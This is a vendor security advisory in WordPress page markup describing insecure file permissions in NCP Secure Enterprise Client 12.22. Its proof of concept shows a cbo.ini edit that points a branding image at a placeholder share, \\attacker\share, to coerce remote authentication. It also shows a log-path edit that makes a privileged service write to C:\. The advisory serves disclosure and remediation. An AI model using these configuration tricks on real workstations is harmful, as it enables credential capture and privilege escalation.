{"id":19539,"date":"2022-08-31T16:56:00","date_gmt":"2022-08-31T14:56:00","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=19539"},"modified":"2023-03-03T12:54:33","modified_gmt":"2023-03-03T11:54:33","slug":"usd-2022-0004","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2022-0004\/","title":{"rendered":"usd-2022-0004"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.16\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.17.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n

usd-2022-0004 | NCP Secure Enterprise Client - Insecure File Permissions<\/h1>\n

Advisory ID:<\/strong> usd-2022-0004
Product:<\/strong> NCP Secure Enterprise Client
Affected Version:<\/strong> 12.22
Vulnerability Type:<\/strong> Insecure File Permissions
Security Risk:<\/strong> Medium
Vendor URL:<\/strong> https\/\/www.ncp-e.com\/
Vendor Status:<\/strong> Fixed<\/p>\n

Description<\/h3>\n

The NCP Secure Enterprise<\/em> client is a VPN<\/em> and networking application that is utilized by many organisations to connect workstations
to the cooperate network. The client stores it's configuration files within the directory C:\\\\ProgramData\\\\NCP\\\\SecureClient<\/strong>, which grants
low privileged user accounts write access to most resources. Attackers can abuse this configuration in different ways as demonstrated
in the Proof of Concept<\/em> section below:<\/p>\n

Proof of Concept<\/h3>\n

This section contains proof of concepts for some of the writable resources:<\/p>\n

cacerts<\/h4>\n

Since the folder C:\\\\ProgramData\\\\NCP\\\\SecureClient\\\\cacerts<\/strong> is writable for low privileged user accounts, it is possible to add new CA<\/em>
certificates that may allow connections to untrusted endpoints:<\/p>\n

\"\"<\/p>\n

cbo.ini<\/h4>\n

The file C:\\\\ProgramData\\\\NCP\\\\SecureClient\\\\config\\\\cbo.ini<\/strong> is also writable for low privileged user accounts. This file
can be used to configure custom branding of the NCP Secure Enterprise<\/em> client by specifying the path to the desired theme
files. By specifying the address of a network share instead, it is possible to coerce a remote authentication by each user
that logs in on the prepared workstation. Furthermore, since the NCP Secure Enterprise<\/em> client starts on startup, an remote
authentication of the machine account can be coerced.<\/p>\n

\n
<\/span>[GENERAL]<\/span><\/span>
Enabled<\/span>=<\/span>1<\/span><\/span>[DEUTSCH]<\/span><\/span>
Picture<\/span>=<\/span>\\\\\\\\attacker\\\\share\\\\test.png<\/span><\/span>
HtmlLocal<\/span>=<\/span>%BaseDataDir%\\\\CustomBrandingOption\\\\de\\\\bla.html<\/span><\/span>[ENGLISH]<\/span><\/span>
Picture<\/span>=<\/span>\\\\\\\\attacker\\\\share\\\\test.png<\/span><\/span>
HtmlLocal<\/span>=<\/span>%BaseDataDir%\\\\CustomBrandingOption\\\\en\\\\bla.html<\/span><\/span><\/pre>\n<\/div>\n
ncpmon.ini<\/h4>\n
The file C:\\\\ProgramData\\\\NCP\\\\SecureClient\\\\config\\\\ncpmon.ini<\/strong> contains several different configuration settings.
One of them is the LogPath<\/strong> setting within the Gina<\/em> section. Since the file is writable by low privileged user
accounts, it is possible to set the LogPath<\/strong> to an arbitrary directory.<\/p>\n
\n
<\/span>[GENERAL]<\/span><\/span>
...SNIP...<\/span><\/span>[GINA]<\/span><\/span>
DisableGinaClient<\/span>=<\/span>0<\/span><\/span>
LogLevel<\/span>=<\/span>9<\/span><\/span>
LogPath<\/span>=<\/span>C:\\\\<\/span><\/span><\/pre>\n<\/div>\n
The configuration is then used by a high privileged service to write into the corresponding location:<\/p>\n
\n
<\/span>C:\\\\>dir<\/span>
 Datentr\u00e4ger in Laufwerk C: ist Windows<\/span>   Verzeichnis von C:\\\\<\/span>   05.05.2021  10:09    <DIR>          Program Files<\/span>
   05.05.2021  10:09    <DIR>          Program Files (x86)<\/span>
   05.05.2021  10:09    <DIR>          Users<\/span>
   05.05.2021  10:09    <DIR>          Windows<\/span>
   30.11.2021  10:51         1.960.248 NcpGinaLog.txt<\/span><\/pre>\n<\/div>\n
Apart form the above mentioned issues, other attacks may be possible. The file extdial.conf<\/strong> contains e.g.
the filenames of dynamic linked library<\/em> (DLL<\/em>) files which could may lead to privilege escalation vulnerabilities
on certain setups.<\/p>\n
Fix<\/h3>\n
The contents of the configuration folder should be reviewed and more restrictive permissions should be applied
to files that store sensitive configuration items. Low privileged user accounts should only be allowed to modify
configuration options that do not affect the security of the operating system.<\/p>\n
References<\/h3>\n